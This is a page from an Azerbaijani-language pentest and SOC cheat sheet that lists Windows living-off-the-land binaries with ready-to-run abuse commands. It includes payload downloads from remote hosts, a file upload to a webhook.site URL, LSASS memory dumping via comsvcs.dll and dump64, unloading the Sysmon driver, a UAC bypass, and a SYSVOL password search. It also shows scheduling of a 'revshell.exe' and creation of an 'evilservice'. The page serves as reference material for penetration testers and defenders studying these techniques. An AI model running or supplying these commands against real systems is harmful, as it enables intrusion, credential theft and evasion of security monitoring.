Pentest və SOC Cheat Sheet
  • Reconnaissance
  • Post-Explotation
    • Linux Post-Explotation
      • Linux Local Enumeration
      • Linux Privilege Escalation
      • Dumping and cracking hashes on Linux
      • Linux Persistence
    • Windows Post-Explotation
      • Windows Local Enumeration
      • Windows Privilege Escalation
      • Windows Persistence
  • Network Services Pentesting
    • 21-Pentesting FTP
    • 22-Pentesting SSH
    • 23-Pentesting Telnet
    • 53-Pentesting DNS
    • 25,465,587-Pentesting SMTP
    • 110,995-Pentesting POP
    • 139,445-Pentesting SMB
    • 3306-Pentesting MySQL
    • 3389-Pentesting RDP
    • 1433-Pentesting MSSQL-Microsoft SQL Server
    • 389,636,3268,3269-Pentesting LDAP
  • Web Pentesting
    • Broken Access Control
      • Praktiki nümunə
    • OS Command Injection
      • Praktiki nümunə
    • SQL Injection
      • Praktiki nümunə
    • Cross-Site-Scripting (XSS)
      • Praktiki nümunə
    • File Upload
      • Praktiki nümunə
    • Directory Traversal və Path Traversal
      • Praktiki nümunə
    • CSRF
    • XXE
    • Clickjacking
      • Praktiki nümunə
    • SSRF
      • Praktiki nümunə
    • JWT (Json Web Token)
      • Praktiki nümunə
    • Local&Remote File İnclusion
      • Praktiki nümunə
      • Local File inclusion ilə reverse shell almaq
    • 401&403 Bypass
    • Login Bypass
    • Open Redirect
    • Unicode Injection
    • Security Misconfiguration
    • CRLF injection
    • LDAP Injection
    • Cookies Hacking
    • Cross site WebSocket hijacking (CSWSH)
    • SSTI (Server Side Template Injection)
    • CSTI (Client Side Template Injection)
    • XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
    • Registration & Takeover Vulnerabilities
    • Regular expression Denial of Service - ReDoS
    • Reset/Forgotten Password Bypass
    • SAML Hücumları
    • Reverse Tab Nabbing
    • Web Tool - WFuzz
    • XPATH enjeksiyonu
    • Server-Side Includes (SSI) Injection
    • Edge Side Inclusion Injection (ESII)
    • Race Condition
    • PostMessage
    • Parameter Pollution
    • Cache Poisoning and Cache Deception
    • Captcha Bypass
  • AD Pentesting
    • Domain Enumeration
      • PowerView ilə enumeration
      • AD Module ilə enumeration
      • BloodHound ilə enumeration
        • On Site BloodHound
      • Using Adalanche
        • Remote adalanche
      • Useful Enumeration Tools
    • Local Privilege Escalation
      • Useful Local Priv Esc Tools
      • UAC Bypass
    • Lateral Movement
      • Powershell Remoting
      • Mimikatz
      • Remote Desktop Protocol
      • URL File Attacks
      • Useful Tools
    • Domain Privilege Escalation
      • Kerberoast
      • ASREPRoast
      • Password Spray Attack
      • Force Set SPN
      • Abusing Shadow Copies
      • List and Decrypt Stored Credentials using Mimikatz
      • Unconstrained Delegation
      • Constrained Delegation
      • Resource Based Constrained Delegation
      • DNSAdmins Abuse
      • Abusing Active Directory-Integraded DNS (ADIDNS) poisoning
      • Abusing Backup Operators Group
      • SID History Abuse
      • Active Directory Certificate Services
    • Domain Persistence
      • Golden Ticket Attack
      • Silver Ticket Attack
      • Skeleton Key Attack
      • DSRM Abuse
      • DCsync Attack
    • Cross Forest Attacks
      • Trust Tickets
      • Abuse MSSQL Servers
      • Breaking Forest Trusts
  • SOC - Cheat Sheet
    • SOC Nədir?
    • SOC Komponentləri Nələrdir?
    • SOC Checklist
    • SIEM
      • Splunk Qurulması və Konfiqurasiyası
    • IDS/IPS
    • Firewall
    • Firewall qurulması və konfiqurasiyası
    • EDR/XDR
    • SOAR
    • Windows Commands for SOC analysts
      • GUI Programs in Windows
      • Event Viewer
      • Task Scheduler
      • Group Policy Editor
      • Device Manager
      • Task Manager
      • Registry Manager
    • Linux Commands for SOC analysts
    • LOLBAS Apps and Commands
      • Apps and Commands
Powered by GitBook
On this page

Was this helpful?

  1. SOC - Cheat Sheet
  2. LOLBAS Apps and Commands

Apps and Commands

PreviousLOLBAS Apps and Commands

Last updated 1 year ago

Was this helpful?

Execute

AddinUtil 'Addins.Store' faydalı yükünün mövcud olduğu kataloqdan icra edilir, AddinUtil 'Addins.Store' faydalı yükünü yerinə yetirəcək.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe -AddinRoot:.

Download

AppInstaller.exe URI üçün standart işləyici tərəfindən yaradılıb, o, paketi URL-dən yükləməyə/quraşdırmağa cəhd edir.

start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw

AWL Bypass

Quraşdırma Provayderi və lazımi qovluq strukturu ilə C# kodunu yerinə yetirin.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u

Execute

Hər gün müəyyən bir vaxtda yerinə yetirmək üçün təkrarlanan tapşırıq yaradın.

C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe

Execute

Qeydiyyatdan keçmiş Assistive Technology (AT) işə salın.

ATBroker.exe /start malware

bash.exe-dən calc.exe-ni icra edir

bash.exe -c calc.exe

Alternate data streams

bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1

Execute

certoc.exe -LoadDLL "C:\test\calc.dll"

Download

CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt

Download,Encode,Decode

certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
certutil -encode inputFileName encodedOutputFileName
certutil -decode encodedInputFileName decodedOutputFileName

Download,Upload

Müəyyən edilmiş faylı WebDAV serverindən hədəf fayla yükləyir.Müəyyən edilmiş faylı WebDAV serverinə yükləyir.

type \\webdav-server\folder\file.ext > C:\Path\file.ext
type C:\Path\file.ext > \\webdav-server\folder\file.ext

Credentials

cmdkey /list

Execute

cmstp.exe /ni /s c:\cmstp\CorpVPN.inf

Copy

colorcpl file.txt

Upload,Download

ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
ConfigSecurityPolicy.exe https://example.com/payload

Execute

conhost.exe calc.exe

Compile

File.cs-də saxlanılan C# kodunu tərtib etmək və tərtib edilmiş versiyanı My.exe-yə çıxarmaq üçün CSC.EXE-dən istifadə edin.

csc.exe -out:My.exe File.cs
csc -target:library File.cs

Conceal

DeviceCredentialDeployment

Dump,Execute

Hazırlanmış disk kölgəsi skriptindən diskshadow.exe istifadə edərək əmrləri yerinə yetirin.

diskshadow.exe /s c:\test\diskshadow.txt
diskshadow> exec calc.exe

UAC Bypass

Başlanğıc zamanı eventvwr.exe, eventvwr.msc saxlanan konsol faylını açmaq üçün istifadə edilən mmc.exe-nin yeri üçün HKCU\Software\Classes\mscfile\shell\open\command reyestr dəyərini yoxlayır. Bu reyestr dəyərinə başqa ikili və ya skriptin yeri əlavə edilərsə, o, istifadəçiyə UAC sorğusu göstərilmədən yüksək bütövlükdə proses kimi icra olunacaq.

ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe

Credentials,Download

SYSVOL-da saxlanılan Qrup Siyasəti fayllarında saxlanılan parolu axtarın.

findstr /S /I cpassword \\sysvol\policies\*.xml

Tamper

Təhlükəsizlik agentləri tərəfindən istifadə edilən sürücünü yükdən çıxarır

fltMC.exe unload SysmonDrv

Execute

echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt

Execute,AWL bypass

msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE

Reconnaissance

GUI yaratmadan istifadəçi ekranını yazın. Siz qeydi dayandırmaq və çıxış faylı yaratmaq üçün "psr.exe /stop" istifadə etməlisiniz.

psr.exe /start /output D:\test.zip /sc 1 /gui 0

Execute

Pester.bat [/help|?|-?|/?] "$null; notepad"

Execute

pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct

Download

8080 portunda yerli olaraq yerləşdirilən xidmət üçün yönləndirilmiş portun internetdə nümayiş etdirilməsinə icazə verilir.

devtunnel.exe host -p 8080

Execute,Download

wsl.exe -e /mnt/c/Windows/System32/calc.exe

Download

Downloads payload from remote server

winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"

Execute

VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here"

Awl Bypass

Tracker.exe /d .\calc.dll /c C:\Windows\write.exe

Download, Execute

squirrel.exe --download [url to package]
squirrel.exe --update [url to package]
squirrel.exe --updateRollback=[url to package]

Execute

Modul və ScriptBlock Girişi olmadan SQL Server PowerShell mini konsolunu işə salın.

SQLToolsPS.exe -noprofile -command Start-Process calc.exe

Dump

sqldumper.exe 464 0 0x0110

Execute

Powershell-i remote.exe-nin uşaq prosesi kimi yaradır

Remote.exe /s "powershell.exe" anythinghere

Uzaq serverdən yükü endirir

ProtocolHandler.exe https://example.com/payload

Execte

OpenConsole.exe calc

Download

mspub.exe https://example.com/payload

Execute,AWL Bypass

msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"

Execute

Mftrace.exe cmd.exe

Download

Excel.exe http://192.168.1.10/TeamsAddinLoader.dll

Dump

DumpMinitool.exe --file c:\users\mr.d0x\dump.txt --processId 1132 --dumpType Full

Dump

Creates a memory dump of the LSASS process.

dump64.exe <pid> out.dmp

Execute

dotnet.exe [PATH_TO_DLL]

MSI faylını C:\Windows\Installer-ə yükləyir və sonra quraşdırır.

devinit.exe run -t msi-install -i https://example.com/out.msi

Execute

csi.exe file

Dump

createdump.exe -n -f dump.dmp [PID]

Dump

rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full

Execute

rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"

Execute

rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"

Websockets vasitəsilə global.rel.tunnels.api.visualstudio.com üzərindən əks PowerShell bağlantısını işə salır; əmr

code.exe tunnel --accept-server-license-terms --name "tunnel-name"

UAC Bypass

wsreset.exe

Alternate DATA Streams

wmic.exe process call create "c:\ads\file.txt:program.exe"

Execute

rmdir %temp%\lolbin /s /q 2>nul & mkdir "%temp%\lolbin\Windows Media Player" & copy C:\Windows\System32\calc.exe "%temp%\lolbin\Windows Media Player\wmpnscfg.exe" >nul && cmd /V /C "set "ProgramW6432=%temp%\lolbin" && unregmp2.exe /HideWMP"

Execute

ssh localhost calc.exe
sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice

Execute

rundll32.exe AllTheThingsx64,EntryPoint

AddinUtil.exe
AppInstaller.exe
Aspnet_Compiler.exe
At.exe
Atbroker.exe
Bash.exe
Bitsadmin.exe
CertOC.exe
CertReq.exe
Certutil.exe
Cmd.exe
Cmdkey.exe
Cmstp.exe
Colorcpl.exe
ConfigSecurityPolicy.exe
Conhost.exe
Csc.exe
DeviceCredentialDeployment.exe
Diskshadow.exe
Eventvwr.exe
Findstr.exe
fltMC.exe
Ftp.exe
Msdt.exe
Psr.exe
Pester.bat
Pubprn.vbs
devtunnel.exe
Wsl.exe
Winword.exe
VSIISExeLauncher.exe
Tracker.exe
Squirrel.exe
SQLToolsPS.exe
Sqldumper.exe
Remote.exe
ProtocolHandler.exe
OpenConsole.exe
Mspub.exe
Msdeploy.exe
Mftrace.exe
Excel.exe
DumpMinitool.exe
Dump64.exe
Dotnet.exe
Devinit.exe
csi.exe
Createdump.exe
Comsvcs.dll
Shdocvw.dll
Mshtml.dll
code.exe
Wsreset.exe
Wmic.exe
Unregmp2.exe
ssh.exe
Sc.exe
Rundll32.exe